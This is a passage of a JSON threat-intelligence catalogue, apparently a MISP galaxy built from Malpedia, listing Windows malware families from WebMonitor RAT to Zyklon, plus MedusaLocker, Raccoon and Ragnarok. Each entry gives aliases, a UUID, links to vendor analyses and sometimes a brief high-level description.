and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.'\r\nUnit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], "synonyms": [], "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" ], "synonyms": [], "type": [] }, "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" ], "synonyms": [], "type": [] }, "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", "value": "WildFire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a100902-7204-4f20-b838-545ed86d4428", "value": "WinMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", "https://github.com/TKCERT/winnti-nmap-script", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", "https://securelist.com/games-are-over/70991/", "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" ], "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, { "description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", "https://securelist.com/atm-robber-winpot/89611/" ], "synonyms": [ "ATMPot" ], "type": [] }, "uuid": "893a1da2-ae35-4877-8cde-3f532543af36", "value": "WinPot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [], "type": [] }, "uuid": "db755407-4135-414c-90e3-97f5e48c6065", "value": "Winsloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" ], "synonyms": [], "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", "value": "Wipbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", "https://secrary.com/ReversingMalware/WMIGhost/", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [ "Syndicasec", "Wimmie" ], "type": [] }, "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", "value": "WMI Ghost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", "value": "WndTest" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" ], "synonyms": [], "type": [] }, "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", "value": "Wonknu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" ], "synonyms": [], "type": [] }, "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", "value": "woody" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "WoolenLogger" ], "type": [] }, "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] }, "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", "value": "WSCSPL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ "chopstick", "splm" ], "type": [] }, "uuid": "e8b38fbd-a7ce-4073-a660-44dfabc1b678", "value": "X-Agent (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" ], "synonyms": [], "type": [] }, "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", "value": "XBot POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" ], "synonyms": [], "type": [] }, "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", "value": "Xpan" }, { "description": "Incorporates code of Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" ], "synonyms": [ "Expectra" ], "type": [] }, "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", "value": "XPCTRA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [], "type": [] }, "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", "value": "XP PrivEsc (CVE-2014-4076)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "nokian" ], "type": [] }, "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", "value": "xsPlus" }, { "description": "X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" ], "synonyms": [ "xaps" ], "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", "value": "X-Tunnel" }, { "description": "This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net", "https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28" ], "synonyms": [], "type": [] }, "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, { "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", "https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" ], "synonyms": [], "type": [] }, "uuid": "8a57cd75-4572-47c2-b5ef-55df978258de", "value": "Xwo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ "ShadowWalker" ], "type": [] }, "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", "value": "xxmm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "KeyBoy" ], "type": [] }, "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", "value": "Yahoyah" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" ], "synonyms": [ "aumlib", "bbsinfo" ], "type": [] }, "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", "value": "yayih" }, { "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", "https://www.youtube.com/watch?v=AUGxYhE_CUY" ], "synonyms": [ "DarkShare" ], "type": [] }, "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", "value": "YoungLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", "value": "yty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ "Zekapab" ], "type": [] }, "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", "value": "Zebrocy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" ], "synonyms": [], "type": [] }, "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", "value": "Zebrocy (AutoIT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" ], "synonyms": [], "type": [] }, "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ "Max++", "Sirefef", "Smiscer" ], "type": [] }, "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", "value": "ZeroAccess" }, { "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", "value": "ZeroEvil" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" ], "synonyms": [], "type": [] }, "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", "value": "ZeroT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", "https://zeustracker.abuse.ch/monitor.php", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://eternal-todo.com/blog/new-zeus-binary", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", "https://www.mnin.org/write/ZeusMalware.pdf", "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", "http://eternal-todo.com/blog/detecting-zeus", "https://www.secureworks.com/research/zeus?threat=zeus", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" ], "synonyms": [ "Zbot" ], "type": [] }, "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", "value": "Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" ], "synonyms": [], "type": [] }, "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", "value": "Zeus MailSniffer" }, { "description": "This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.\r\n\r\nIn June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB.\r\nIn January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", "https://asert.arbornetworks.com/great-dga-sphinx/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" ], "synonyms": [ "XSphinx" ], "type": [] }, "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", "value": "Zeus OpenSSL" }, { "description": "This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9.\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html", "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/" ], "synonyms": [], "type": [] }, "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", "value": "Zeus Sphinx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", "https://twitter.com/siri_urz/status/923479126656323584", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" ], "synonyms": [], "type": [] }, "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", "value": "Zezin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", "value": "ZhCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "989330e9-52da-4489-888b-686429db3a45", "value": "ZhMimikatz" }, { "description": "This family describes the (initially small) loader, which downloads Zeus OpenSSL.\r\n\r\nIn June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded.\r\nThe initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/" ], "synonyms": [ "DELoader", "Terdot" ], "type": [] }, "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", "value": "Zloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" ], "synonyms": [ "gresim" ], "type": [] }, "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", "value": "ZoxPNG" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://github.com/smb01/zxshell", "https://blogs.cisco.com/security/talos/opening-zxshell", "https://blogs.rsa.com/cat-phishing/" ], "synonyms": [ "Sensocode" ], "type": [] }, "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", "value": "ZXShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html", "https://asert.arbornetworks.com/wp-content/uploads/2017/05/zyklon_season.pdf" ], "synonyms": [], "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", "value": "Zyklon" }, { "description": "A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker" ], "synonyms": [], "type": [] }, "uuid": "237a1c2e-fb14-583d-ab2c-71f10a52ec06", "value": "MedusaLocker" }, { "description": "Raccoon is a stealer and collects \"passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf", "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block" ], "synonyms": [ "Racoon" ], "type": [] }, "uuid": "10c03b2e-5e53-11ea-ac08-00163cdbc7b4", "value": "Raccoon" }, { "description": "According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw" ], "synonyms": [], "type": [] }, "uuid": "10c03b2f-5e52-01ea-bc08-00153cdbc7b3", "value": "Ragnarok" } ], "version": 2563 }